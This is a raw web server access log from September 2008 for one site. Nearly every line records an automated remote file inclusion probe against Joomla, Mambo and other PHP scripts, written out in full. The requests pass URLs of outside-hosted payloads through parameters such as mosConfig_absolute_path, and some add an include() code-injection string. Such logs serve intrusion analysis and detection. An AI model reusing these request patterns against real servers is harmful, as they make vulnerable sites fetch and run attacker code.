217.107.217.183 - - [22/Sep/2008:10:30:57 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:31:05 -0700] "GET /logs/access_080717.log/errors.php?error=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:31:05 -0700] "GET /errors.php?error=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:31:05 -0700] "GET /logs/errors.php?error=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.20.229.11 - - [22/Sep/2008:10:31:10 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.fittkau-edv.de/attachments/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:31:19 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:31:23 -0700] "GET /logs/access_080824.log/errors.php?error=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:31:24 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:31:32 -0700] "GET /logs/access_080303.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:31:33 -0700] "GET /logs/access_080303.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:31:42 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:31:43 -0700] "GET /popup.php?path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:31:45 -0700] "GET /logs/popup.php?path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:31:52 -0700] "GET /logs/access_080302.log/popup.php?path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:32:00 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:10:33:01 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.211.11.1 - - [22/Sep/2008:10:33:01 -0700] "GET /logs/access_080618.log//load_lang.php?_SERWEB[serwebdir]=http://kaizoku1.fortunecity.com/sca/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.211.11.1 - - [22/Sep/2008:10:33:06 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://kaizoku1.fortunecity.com/sca/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.211.11.1 - - [22/Sep/2008:10:33:06 -0700] "GET /logs/access_080810.log//load_lang.php?_SERWEB[serwebdir]=http://kaizoku1.fortunecity.com/sca/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.211.11.1 - - [22/Sep/2008:10:33:06 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://kaizoku1.fortunecity.com/sca/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:33:21 -0700] "GET /logs/access_080215.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:33:24 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:33:27 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:33:29 -0700] "GET /logs//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:33:29 -0700] "GET //include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:33:34 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trade-an-item.com/docs/sql/welcome.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:33:36 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trade-an-item.com/docs/sql/welcome.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:33:36 -0700] "GET /logs/access_080303.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trade-an-item.com/docs/sql/welcome.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:33:39 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trade-an-item.com/docs/sql/welcome.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:33:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:33:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.65.103.130 - - [22/Sep/2008:10:33:48 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.203.222.221 - - [22/Sep/2008:10:33:53 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.222.221 - - [22/Sep/2008:10:33:54 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:33:56 -0700] "GET /logs/access_080119.log/classes/core/language.php?rootdir=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:10:34:01 -0700] "GET /logs/access_080816.log//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:10:34:07 -0700] "GET /logs/access_080830.log//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.0.253.2 - - [22/Sep/2008:10:34:16 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.253.2 - - [22/Sep/2008:10:34:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.253.2 - - [22/Sep/2008:10:34:16 -0700] "GET /logs/access_080630.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.253.2 - - [22/Sep/2008:10:34:16 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:10:34:23 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:10:34:24 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:34:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:34:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:10:34:27 -0700] "GET /logs/access_080524.log/index.php?menu=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:34:29 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:34:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:35:04 -0700] "GET /logs/access_080901.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:35:40 -0700] "GET /logs/access_080215.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:35:43 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:35:48 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:56 -0700] "GET /logs/access_080619.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:56 -0700] "GET /logs/access_080619.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:56 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:56 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:57 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:35:57 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:35:59 -0700] "GET /logs/access_080826.log%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:36:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:36:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.111.166.193 - - [22/Sep/2008:10:36:05 -0700] "GET /logs/access_080603.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.111.166.193 - - [22/Sep/2008:10:36:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.111.166.193 - - [22/Sep/2008:10:36:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:36:18 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:36:21 -0700] "GET /logs/access_080714.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:36:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:36:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:36:23 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:36:23 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:36:38 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:36:46 -0700] "GET /logs/ HTTP/1.0" 200 66130 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:36:50 -0700] "GET /logs/access_080608.log/main.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:36:50 -0700] "GET /main.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:36:50 -0700] "GET /logs/main.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:36:50 -0700] "GET /logs/access_080304.log/main.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:36:56 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:36:56 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:37:00 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 200 95221 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:37:03 -0700] "GET /logs/access_080128.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:37:06 -0700] "GET /logs/access_080714.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:37:09 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.103.130 - - [22/Sep/2008:10:37:15 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.103.130 - - [22/Sep/2008:10:37:15 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.103.130 - - [22/Sep/2008:10:37:16 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:37:28 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:37:58 -0700] "GET /logs/access_080119.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:38:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:38:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:38:21 -0700] "GET /logs/access_080124.log//index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:38:23 -0700] "GET //index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95082 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:38:24 -0700] "GET /logs//index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:38:28 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:38:28 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:38:28 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.103.130 - - [22/Sep/2008:10:38:36 -0700] "GET /logs/access_080725.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:38:41 -0700] "GET /logs/access_080205.log//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:38:41 -0700] "GET /logs//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:38:42 -0700] "GET //admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [22/Sep/2008:10:38:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [22/Sep/2008:10:38:44 -0700] "GET /minamijewelry/html/flower.html HTTP/1.1" 200 20956 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:38:52 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:38:53 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:38:54 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:39:02 -0700] "GET /logs/access_080219.log//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:39:10 -0700] "GET /logs/access_080128.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:39:28 -0700] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:39:29 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 200 94964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
